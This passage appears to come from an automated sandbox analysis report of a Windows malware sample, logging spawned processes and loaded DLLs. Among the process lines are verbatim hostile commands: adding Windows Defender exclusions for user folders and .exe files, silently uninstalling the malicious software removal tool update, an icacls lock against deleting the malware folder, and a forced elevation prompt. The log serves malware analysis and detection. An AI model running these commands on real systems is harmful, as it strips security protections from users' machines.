Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe C:\Users\user\AppData\Local\Temp\A5B6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe "C:\Users\user\AppData\Local\Temp\A5B6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe --Task Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2580 -ip 2580
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8792
Source: C:\Windows\System32\WerFault.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\filename.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: amsi.dll
